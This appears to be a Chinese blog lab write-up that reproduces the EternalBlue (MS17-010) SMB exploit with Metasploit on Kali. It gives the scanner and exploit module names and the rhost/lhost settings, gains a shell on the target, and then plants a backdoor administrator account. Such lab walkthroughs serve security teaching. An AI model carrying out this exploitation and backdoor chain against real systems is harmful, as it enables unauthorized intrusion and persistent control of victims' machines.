永恒之蓝(ms17-010)漏洞复现

永恒之蓝(EternalBlue)是由美国国家安全局开发的漏洞利用程序,对应微软漏洞编号ms17-010。该漏洞利用工具由一个名为”影子经济人”(Shadow Brokers)的神秘黑客组织于2017年4月14日公开的利用工具之一,该漏洞利用工具针对TCP 445端口(Server Message Block/SMB)的文件分享协议进行攻击,攻击成功后将被用来传播病毒木马。由于利用永恒之蓝漏洞利用工具进行传播病毒木马事件多,影响特大,因此很多时候默认将ms17-010漏洞称为“永恒之蓝”。

由于永恒之蓝利用工具会扫描开放445文件共享端口的Windows机器,所以如果用户开启445端口并且系统未打MS17-010补丁就会在无感状态下被不法分子向系统植入恶意代码。

实验

查看数据库是否开启service postgresql status

dead表示关闭
在这里插入图片描述

开启数据库
在这里插入图片描述

利用kali系统
打开msf
永恒之蓝(ms17-010)漏洞复现_第1张图片

查看数据库情况,说明连接成功
在这里插入图片描述
搜索ms17_010
使用下面两个模块
永恒之蓝(ms17-010)漏洞复现_第2张图片
扫描命令use auxiliary/scanner/smb/smb_ms17_010
攻击命令use exploit/windows/smb/ms17_010_eternalblue

关注RHOSTS主机段和THREADS线程,默认为1
永恒之蓝(ms17-010)漏洞复现_第3张图片
设置扫描主机段
设置线程
在这里插入图片描述
Run开始扫描
用wireshark抓包

永恒之蓝(ms17-010)漏洞复现_第4张图片

跟踪TCP流,得到靶机基本信息
发现了目标主机的系统和ip永恒之蓝(ms17-010)漏洞复现_第5张图片
进行攻击
设置攻击目标set rhost
设置监听主机set lhost
在这里插入图片描述
options帮助
永恒之蓝(ms17-010)漏洞复现_第6张图片

开始攻击exploit
永恒之蓝(ms17-010)漏洞复现_第7张图片
直接拿到shell
ipconfig
确认是目标主机
永恒之蓝(ms17-010)漏洞复现_第8张图片

种植后门

创建一个用户
并查看
永恒之蓝(ms17-010)漏洞复现_第9张图片
加入管理员用户
并查看

永恒之蓝(ms17-010)漏洞复现_第10张图片
成功植入用户

你可能感兴趣的:(永恒之蓝(ms17-010)漏洞复现)